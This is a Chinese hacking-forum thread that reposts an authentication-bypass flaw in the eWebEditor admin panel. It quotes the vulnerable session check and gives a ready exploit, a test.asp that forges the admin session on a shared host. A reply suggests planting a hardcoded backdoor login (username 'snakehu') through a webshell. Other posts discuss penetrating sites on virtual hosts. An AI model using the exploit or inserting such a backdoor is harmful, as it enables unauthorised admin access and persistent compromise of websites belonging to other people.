[转载]eWebEditor session欺骗漏洞
文章作者:nowthkeWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个test.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问test.asp,再访问后台任何文件,for example:Admin_Default.asp
漏洞影响:虚拟主机的克星. by nowthk 记得如果要session欺骗,我想那个test.asp就必须存放在对象网站上,不知道是不是。
请问如果是的话如何实现这个,通过Webshell吗?如果有webshell我觉得可以修改源文件的验证部分比较省事。
[quote]Select Case sAction
Case "LOGIN"
s_Usr = Trim(Request("usr"))
s_Pwd = Trim(Request("pwd"))
If s_Usr <> "" And s_Pwd <> "" Then
sSql = "select * from ewebeditor_system"
oRs.Open sSql, oConn, 0, 1
If Not oRs.Eof Then
If oRs("sys_username") = md5(s_Usr) And oRs("sys_userpass") = md5(s_Pwd) Then
' 登录成功
Session("eWebEditor_User") = s_Usr
Session("eWebEditor_Version") = oRs("sys_version")
Response.Redirect "admin_default.asp"
Response.End
End If
End If
oRs.Close
End If
sErrMsg = "提示:用户名或密码错误!"
Case "OUT"
Session("eWebEditor_User") = ""
End Select[/quote]
感觉上如果有Webshell只要在5排(If s_Usr <> "" And s_Pwd <> "" Then)前加入:
[quote]If S_Usr = "snakehu" then
Session("eWebEditor_User") = s_Usr
Session("eWebEditor_Version") = oRs("sys_version")
Response.Redirect "admin_default.asp"
Response.End
End if[/quote]
小弟才疏学浅。要是错了,别笑话我哈。呵呵呵。 楼上说的没错.但lz是对与虚拟主机上其他地方没有写权限站点渗透的时候.用session欺骗这个方法是很理想的 bbsxp 5.15跨站攻击漏洞
[url]http://www.gingili.cn/data/2005/1002/article_79.htm[/url] 不过这样的话目标网站和我们已经入侵的网站应该是同一个域名下的吧 [quote][b]下面是引用etong于2005-10-02 23:02发表的:[/b]
bbsxp 5.15跨站攻击漏洞
[url]http://www.gingili.cn/data/2005/1002/article_79.htm[/url][/quote]
倒!我发现这漏洞已几个月了,网上现在不知哪个家伙改了我的文章,说成是他的!传遍了!
页:
[1]